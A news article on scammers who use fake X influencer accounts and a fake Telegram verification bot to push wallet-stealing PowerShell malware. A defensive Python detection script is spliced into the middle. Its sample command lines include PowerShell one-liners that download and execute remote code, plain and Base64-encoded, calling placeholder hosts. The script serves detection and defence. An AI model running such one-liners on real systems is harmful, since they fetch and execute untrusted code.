Fraudsters are using Telegram verification bots to inject crypto-stealing malware.
Scammers are using a combination of social engineering and Telegram verification bots to inject crypto-stealing malware into systems to attack crypto wallets, blockchain security firm Scam Sniffer has warned.
In a December 10 X post, Scam Sniffer said scammers are creating fake X accounts impersonating popular crypto influencers, then inviting users to Telegram groups for investment insights.
Once in a Telegram group, users are asked to authenticate via “OfficiaISAsafeguardBot,” a fake authentication bot that “creates an artificial sense of urgency” with short authentication windows, the company said.
The bot injects malicious PowerShell code that downloads and executes malware to target computer systems and wallets. Scam Sniffer says it has seen “several cases” of similar malware stealing private keys.
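A defensive illustration of the download-and-execute pattern described above, added here and not taken from Scam Sniffer or the original article: a Python triage over process-creation command lines that flags PowerShell invocations combining a network fetch with execution of the fetched content, including Base64 `-EncodedCommand` payloads. The sample events, hostnames, patterns and verdict names are constructed assumptions; the article does not publish the actual script.

```python
import base64
import re

# Constructed process-creation command lines (e.g. Sysmon Event ID 1); not from the article.
SAMPLE_EVENTS = [
    'powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1',
    'powershell.exe -w hidden -c "iex (iwr https://verify.example.invalid/v.ps1 -UseBasicParsing)"',
    'powershell.exe -enc ' + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/a')"
        .encode("utf-16-le")).decode(),
    'powershell.exe -Command "Invoke-WebRequest https://example.invalid/readme.txt -OutFile readme.txt"',
]

# Cmdlets, aliases and .NET methods that fetch remote content.
DOWNLOAD = re.compile(
    r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|start-bitstransfer)\b"
    r"|downloadstring|downloadfile|downloaddata", re.I)
# Cmdlets and aliases that run a string or a file.
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
# PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) followed by Base64.
ENCODED = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand(cmdline):
    """Return the command line plus any decoded -EncodedCommand payload (UTF-16LE)."""
    text = cmdline
    match = ENCODED.search(cmdline)
    if match:
        try:
            text += " " + base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except ValueError:
            pass  # not valid Base64/UTF-16: score the raw line only
    return text

def classify(cmdline):
    """'alert' = fetches and executes, 'review' = only one of the two, 'ok' = neither."""
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return "ok"
    text = expand(cmdline)
    downloads, executes = bool(DOWNLOAD.search(text)), bool(EXECUTE.search(text))
    if downloads and executes:
        return "alert"
    return "review" if downloads or executes else "ok"

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(f"{classify(event):6} {event[:90]}")
```

Matching on keywords is a triage aid only: obfuscated or renamed commands will evade it, so it complements script-block logging and endpoint controls.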
Scam Sniffer told Cointelegraph that the most recent known cases of this type of scam were all caused by fake authentication bots.
“It is currently unclear whether other malicious bots exist. However, it is clear that it is easy for them to imitate others as well,” the organization said.
According to Scam Sniffer, malware that targets regular users has “been around for a long time,” but the infrastructure behind such malicious software is “evolving rapidly” and becoming “more sophisticated.”
When scammers have successful heists and demand grows, they turn to scam-as-a-service, just as makers of crypto wallet-draining software hire out their tools to scammers.
“This is the first time we've seen this unique combination of fake X accounts, fake Telegram channels and malicious Telegram bots,” the firm said, noting that malware has been spread through Telegram and that fraudsters have impersonated others to run malicious code.
Meanwhile, the security firm pointed out that fraudsters impersonating others on X and shilling sham links and tokens are on the rise.
Scam Sniffer's monitoring system detected an average of 300 X scammers per day this month, compared to an average of 160 in November.
At least two victims lost more than $3 million by clicking on malicious links and signing transactions from these fake accounts, the firm added.
Cado Security Labs also sounded the alarm that Web3 employees are being targeted in a campaign to inject malware and use fake harvesting apps to steal data on websites, applications and crypto wallets.
Web3 security platform Cyvers similarly warned this month that phishing attacks could increase in December as hackers try to take advantage of the boom in online transactions ahead of the holiday season.